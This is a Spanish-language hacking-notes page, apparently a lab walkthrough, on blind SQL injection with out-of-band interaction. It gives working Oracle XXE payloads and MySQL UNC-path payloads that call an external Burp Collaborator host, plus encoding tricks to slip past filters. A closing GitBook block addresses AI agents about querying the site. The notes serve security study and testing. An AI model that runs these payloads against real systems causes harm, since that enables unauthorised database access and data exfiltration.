> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/sql-injection/blind-sql-injection-with-oob-interaction.md).

# Inyección SQL ciega con interacción fuera de banda

### Inyección SQL ciega con interacción fuera de banda

**Contexto breve:** el valor de la `TrackingId` La cookie (u otro parámetro) se inyecta en una consulta SQL asíncrona. La respuesta HTTP no revela nada, pero es posible provocar una interacción externa (DNS/HTTP) hacia un servicio Burp Collaborator/OAST, lo que permite exfiltrar o confirmar la ejecución de una carga útil.

<figure><img src="/files/14fed129831456b8224525e428bdc717f4c2f990" alt=""><figcaption></figcaption></figure>

### Técnicas y vectores

#### Oracle — Entidad externa XML (XXE) mediante `EXTRACTVALUE` / `xmltype`

* Principio: construye un documento XML que contenga una entidad externa que apunte a tu subdominio de Collaborator. La llamada a `EXTRACTVALUE(xmltype(...), '/l')` evalúa la DTD y provoca la solicitud saliente HTTP/DNS al dominio controlado:

```sql
' UNION SELECT EXTRACTVALUE(
    xmltype('<?xml version="1.0"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLAB-SUBDOMAIN/"> %remote;]>'),
    '/l') FROM dual-- -
```

* Observaciones: Algunos caracteres deben codificarse/escaparse según el contexto (comillas, `%` en DTD, etc.). En algunos casos, codifica en URL partes de la carga útil.

#### MySQL — Archivos de red mediante `LOAD_FILE` / `SELECT... INTO OUTFILE`

* `LOAD_FILE('//BURP-COLLAB-SUBDOMAIN/a')` puede provocar una consulta saliente SMB/DNS en entornos que permiten acceso de red al servidor de archivos o resuelven rutas UNC.
* `SELECT... INTO OUTFILE '//BURP-COLLAB-SUBDOMAIN/a'` escribe un archivo en un recurso compartido de red, a menudo provocando una interacción de red observable del lado de Collaborator.
* Nota: estas técnicas dependen en gran medida de la configuración (privilegios de la cuenta de la BD, opciones del servidor, acceso de red saliente).

#### Notas prácticas

* Para Burp Collaborator / OAST, usa el subdominio proporcionado (p. ej. `abcd.oastify.com`) en la URL/ruta de la entidad o de la ruta UNC.
* Algunos servidores truncan/filtran las cargas útiles: prueba diferentes variaciones de codificación (codificación URL, `%` escapar → `%25`, variaciones de comentarios, etc.).
* Cuando llegue la solicitud de Collaborator, tienes prueba de ejecución OOB (DNS/HTTP/SMB), lo que confirma la vulnerabilidad.

#### Ejemplo — Variante con codificación (nota: ya la has probado y has recibido la solicitud)

* Ejemplo codificado (que has presentado):

  ```sql
  ' union SELECT EXTRACTVALUE(xmltype('<?xml version="1.0"?><!DOCTYPE root [ <!ENTITY %25 remote SYSTEM "http://vwvitjrnb8um4dlf2x9blfuy3p9gxbl0.oastify.com"> %25remote%3b]>'),'/l') FROM dual-- -
  ```

→ `%` codificación → `%25` y `;` → `%3b` para eludir ciertos filtros/análisis.

<figure><img src="/files/790e46d6e8bc4e53fc0bc933970a78360c9ed662" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/sql-injection/blind-sql-injection-with-oob-interaction.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
